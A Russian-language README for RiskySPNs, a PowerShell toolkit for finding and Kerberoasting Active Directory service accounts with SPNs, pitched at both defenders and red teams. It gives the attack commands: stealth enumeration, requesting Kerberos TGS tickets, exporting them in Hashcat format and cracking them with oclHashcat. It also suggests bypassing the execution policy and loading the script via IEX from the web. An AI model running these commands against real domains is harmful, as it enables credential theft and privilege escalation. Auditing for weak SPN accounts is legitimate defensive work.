
Обнаруживать и злоупотреблять опасными SPN
RiskySPNs — это набор сценариев PowerShell, предназначенных для обнаружения и атак на учётные записи, связанные с SPN (Service Principal Name). Этот модуль может помочь синим командам выявлять потенциально опасные SPN, а также красным командам повышать привилегии с помощью Kerberos и Active Directory.
Подробная информация: http://www.cyberark.com/blog/service-accounts-weakest-link-chain/
Import-Module .\RiskySPNs.psm1
Или просто загрузите сценарий (также можно использовать IEX из веб-источника)
. .\Find-PotentiallyCrackableAccounts.ps1
Убедитесь, что Set-ExecutionPolicy имеет значение Unrestricted или Bypass
Get-Help Get-TGSCipher -Full
Все функции также имеют режим -Verbose
Поиск уязвимых учётных записей
Find-PotentiallyCrackableAccounts
Sensitive + RC4 = $$$
Создание подробного отчёта об уязвимых учётных записях (CISO <3)
Export-PotentiallyCrackableAccounts
Запрос Kerberos TGS для SPN
Get-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433"
Или
Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher
Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txt
oclHashcat64.exe -m 13100 crack.txt -a 3